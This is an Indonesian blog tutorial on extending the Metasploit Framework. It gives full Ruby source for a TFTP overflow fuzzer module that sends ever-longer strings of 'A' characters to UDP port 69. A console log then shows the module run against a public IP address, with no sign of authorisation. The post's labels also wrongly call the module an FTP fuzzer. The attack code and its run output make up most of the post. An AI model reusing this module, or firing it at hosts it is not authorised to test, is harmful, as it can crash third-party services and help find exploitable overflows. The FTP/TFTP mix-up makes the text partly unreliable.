Satu dari sekian banyak aspek Metasploit Framework adalah bagaimana  dengan mudahnya kita membuat fungsi baru dengan menggunakan code-code  program ruby yang ada. Contohnya fuzzer berikut yang sangat sederhana,  kita dapa menggunakan dan memodifikasi seluruh code-code yang ada  didalam Metasploit tersebut.
================================  > Script Codenya
#Metasploit
require  'msf/core'
class Metasploit3 < Msf::Auxiliary
         include Msf::Auxiliary::Scanner
        def initialize
                 super(
                        'Name'           =>  'WhiteCyber TFTP Fuzzer',
                         'Version'        => '$Revision: 1 $',
                         'Description'    => 'Mengirim String ke FTP',
                         'Author'         => 'CyberMuttaqin',
                         'License'        => MSF_LICENSE
                )
                 register_options( [
                Opt::RPORT(69)
                 ], self.class)
        end
        def  run_host(ip)
                # Membuat Socket UDP
                 udp_sock = Rex::Socket::Udp.create(
                         'Context'   =>
                                {
                                         'Msf'        => framework,
                                         'MsfExploit' => self,
                                }
                 )
                count = 10  # Mengeset Jumlah
                 while count < 2000  # Ketika kurang dari 2000 kita eksekusi
                         evil = "A" * count  # Set angka kali untuk kita munculkan angka "A"
                         pkt = "\x00\x02" + "\x41" + "\x00" + evil + "\x00"  # Kita definisikan  Payload
                        udp_sock.sendto(pkt, ip,  datastore['RPORT'])  # Kirim paket
                         print_status("Sending: #{evil}")  # Status update
                         resp = udp_sock.get(1)  # Tangkap hasil respon
                         count += 10  # Tambahkan count dan kita lakukan looping lagi sampai  2000
                end
        end
end
==================================
Kita  lihat code ini bekerja dengan sempurna, meski hal ini nampak sederhana  di permukaan, satu hal yang perlu dipertimbangkan adalah kode ini dapat  kita gunakan kembali dan semua sudah disediakan oleh Metasploit  Framework untuk kita.
==================================  > kita ujicoba code kita tadi
| '_ ` _  \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/  || (_| \__ \ |_) | | (_) | | |_
|_| |_|  |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                             | |
                            |_|
        =[ metasploit v3.5.1-release [core:3.5 api:1.0]
+ -- --=[  635 exploits - 316 auxiliary
+ -- --=[ 215 payloads - 27  encoders - 8 nops
       =[ svn r11338 updated 81 days ago  (2010.12.14)
Warning: This copy of the  Metasploit Framework was last updated 81 days ago.
          We recommend that you update the framework at least every other day.
          For information on updating your copy of Metasploit, please see:
              http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf  > use auxiliary/fuzzers/ftp/WhiteCyberTFTPFuzzer
msf  auxiliary(WhiteCyberTFTPFuzzer) > set RHOSTS 72.14.203.121
RHOSTS  => 72.14.203.121
msf auxiliary(WhiteCyberTFTPFuzzer)  > run
[*] Sending: AAAAAAAAAA
[*]  Sending: AAAAAAAAAAAAAAAAAAAA
[*] Sending:  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[*] Sending:  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[*] Sending:  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
seterusnya  sampai
[*] Sending:  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[*]  Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module  execution completed
msf auxiliary(WhiteCyberTFTPFuzzer)  > quit
root@whitecyber-server:~#
====================================
Dalam  contoh ini kita dapat mendefinisikan struktur payload, sehingga kita  tidak kehilangan banyak waktu. dan dengan code-code fuzzing yang sudah  tersedia ini kita tidak perlu meneliti protocol dulu. Inilah  keistimewaan Metasploit Framework yang menjadi andalan Backtrack !!!
 » 
Programing
 » FTP Fuzzer Metasploit Back !!!
 » 
Programing
 » FTP Fuzzer Metasploit Back !!!
 
   



Silahkan Tulis Komentar Anda ...